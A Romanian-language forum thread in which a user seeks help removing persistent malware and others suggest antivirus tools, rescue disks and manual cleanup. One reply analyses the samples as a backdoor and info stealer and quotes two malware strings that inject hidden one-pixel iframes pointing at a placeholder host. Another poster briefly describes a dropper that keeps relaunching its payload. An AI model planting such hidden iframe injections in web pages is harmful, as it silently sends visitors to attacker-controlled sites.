Oare , cu ce m-am infectat ?

[AlStar]

Am incercat si cu versiunile de Linux de la diferite firme de Antivirus sa scanez si sa sterg virusi , si nu am rezolvat nimic , mai mult ... am facut rost si de unele errori .

Wow...ce ciudat. Oare de ce n-au detectat nimic?

Pune-ti AV, nu mai fi incapatanat. Pentru majoritatea AV-urilor se poate dezactiva auto-scanarea(aia iti mananca memoria); sau mai simplu,iti pui MalwareBytes si scanezi din cand in cand.

[h05th]

Am pus Avira . Am scanat si mi-a gasit executabilele alea , le-a sters si dupa restart , mai stau 2 3 minute si iara au aparut acele executabile. A VERIFICAT CINEVA EXECUTABILELE ALEA SA VADA CARE ESTE PROBLEMA ?

Edited June 30, 2013 by h05th

[onslaught]

Incearca Combofix , cine mi l-a recomandat , multe multumiri.

Sau cu ce m-a ajutat Hackerika (daca te pocesc , imi cer scuze si merit un shlap peste moaca) , Anubis: Analyzing Unknown Binaries uplodeaza-ti ce a gasit combofix or w/e si vezi analiza si de-acolo e la mintea miau miau. Spor.

[yoyois]

legat de virus in sectorul de boot am rezolvat pe XP in Recovery Console cu "fixboot" si "fixmbr".nod32 il vedea in sectorul de boot dar ca sa il stearga cerea restart si la restart revenea la loc

Rootkit?

Eu zic ca ne racim gura degeaba. Virusii pot fi decompilati, au ceva obsfurcare ?

Mi se pare ca nu sunt virusi reali. Sunt prostii dealea rezidte, menite sa te enerveze(se pare ca reusesc).

Daca imi amintesc eu bine, facusem anu' trecut un virus similar (doar ca mult mai silentios)

Instala un dropper ascuns care tot lansa un payload din diferite locatii. AV-ul chiar daca-l localiza si stergea, el reaparea, era arhivat intr-un folder.

Daca e acelasi tip de virus tre sa gasesti dropperul ascuns. Ai grija ca de obicei dropperul ascuns e bine protejat de sistem, nu e asa usor sa-l stergi.

SAU:

ca sa il stearga cerea restart

Poate aici e chestia, la restart virusul migreaza, evitand stergerea

[h05th]

Pai nu stiu ce face virusu ala , este keylogger , botnet ? Ca am fost sunat de cei de la net sa imi zica ca mi-a blocat un port deoarece fac spam ! S-A UITAT CINEVA PESTE EXECUTABILELE ACELEA ? Care ma poate ajuta sa scap 100 % de acel virus , si sa ai gasesc executabilul acela creier o sa ai dau 2 Scannere de VNC-uri !

Edited July 1, 2013 by h05th

[adyttza26]

Pai nu stiu ce face virusu ala , este keylogger , botnet ? Ca am fost sunat de cei de la net sa imi zica ca mi-a blocat un port deoarece fac spam ! S-A UITAT CINEVA PESTE EXECUTABILELE ACELEA ? Care ma poate ajuta sa scap 100 % de acel virus , si sa ai gasesc executabilul acela creier o sa ai dau 2 Scannere de VNC-uri !

Ai incercat macar ce am zis eu ?

[BLODAS666]

Stimate nefericit, faci un cd bootabil cu o solutie antivirus gen Dr.Web, Kaspersky sau BitDefender, si dai scan. Ce ai tu in PC nu poate fi scos atat timp cat sistemul de operare booteaza.

[jojo123]

Se pare ca ai o versiune de sality. Incearaca asta. Dupa (cum zicea si BLODAS666) ruleaza si un Kaspersky Rescue Disk

[EAdrian]

Tu î?i dai seama c? daca cel care te-a prins în Keylogger e român... se pis? pe el de râs?

Reinstaleaz? windows-ul, instaleaz? un antivirus ?i opre?ti scanarea automat? ?i las? hecurile de metin !

[Usr6]

ai gasit tu ceva, dar nu tot. m-am uitat peste fisierele postate de tine:

~13k - un backdoor/proxy

~36k - info stealer/generator de views *

te poti astepta la ceva trafic ...

cat timp nu o gasesti pe mama lor (programu care coord pe cele de mai sus), nu prea poti sa faci nimic cu manutele tale.

oficial:

utilizezi un removal tool ex: dr web, kaspersky

neoficial: -metode neortodoxe cu riscuri pe masura

ai putea instala un firewall (pt firewall-ul din windows are inclus bypass), daca esti pe xp iti recomand sygate si filtrezi tu manual care aplicatie sa se conecteze la internet si care nu, putand astfel sa tii malware-ul sub un oarecare control

poti arunca o privire in start-up si dezactivezi tot ce nu cunosti, dupa care scoti pc din priza (unii malware isi verifica din cand in cand sau inainte de a se inchide daca mai au valorile in registri, scotand brusc pc din priza sunt ceva sanse sa nu mai reintroduca intrarile de start-up, riscu de a crapa pc este de asemenea prezent:) )

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

mai poti identifica procesele infectate utilizand tcpview, de asemenea in loc de task manager poti incerca process explorer

parolele stocate pe pc(browsere, etc) poti sa-ti iei adio de la ele, cat timp nu elimini malware cred ca le schimbi degeaba

*

document.write('<iframe src="http://%s/" width=1 height=1></iframe>')
document.write('<iframe src="http://%s/forum.php?%x" width=1 height=1></iframe>')

[h05th]

Uitati , am scanat un virus ! https://www.virustotal.com/ro/file/d14b66bd4c4c8f66a6edf2820fd4162d09b326beaf6a42014596571e81a1a503/analysis/1372623387/

Virusu foloseste portu pentru SMTP . Stiti vrun program gen "sygate" pentru Windows 7 , sa fie puternic , sa nu poata trece de el virusul .

Comodo am incercat , nu face fata deloc !

Edited July 1, 2013 by h05th

[onslaught]

Poti bloca portul si din Windows firewall.

[h05th]

Acum incerc cu salitykiller de la kaspersky , banuiesc ca va dura "cateva" ore !

[Matt]

h05th : Am citit primul tau post apoi nu am mai urmarit topicul decat pe sarite.Nu e cea mai simpla solutie sa formatezi tot hardul ?? Vad ca te chinui , il formatezi apoi iti instalezi un Antivirus cu licenta frumos si nu mai ai nicio problema.Repet nu am citit topicul in intregime.

//EDIT : Ok , am citit tot topicul.Nu m-am confruntat niciodata cu asemenea probleme insa am rulat si eu cu 1 gb de ram pe un pc foarte vechi.Puteam folosi Microsoft Essentials care nu este nici cel mai bun antivirus insa sigur nu te vei agata de Backdoor sau ce ai tu.

Edited July 1, 2013 by Matt

[h05th]

Am formatat de 3 ori tot HDD-ul ! Am sters toate partitiile .

[Matt]

Am formatat de 3 ori tot HDD-ul ! Am sters toate partitiile .

Poate voi vorbi prostii.Vezi poate este vreun virus de retea.Fa-ti un DVD nou cu un Windows la altcineva in pc.Te duci la pc-ul tau scoti cablul de internet si instalezi Windows-ul cu cablul scos.Apoi dupa ce termini instalezi un Antivirus ( ex: Avast ) si vezi cum sunt lucrurile dupa asta. Eu asa as face in locul tau.

[h05th]

Am folosit prostia aia de la KASPERSKY si mi-a stricat reteaua de internet .. sunt pe black-track ... ma las de Windows .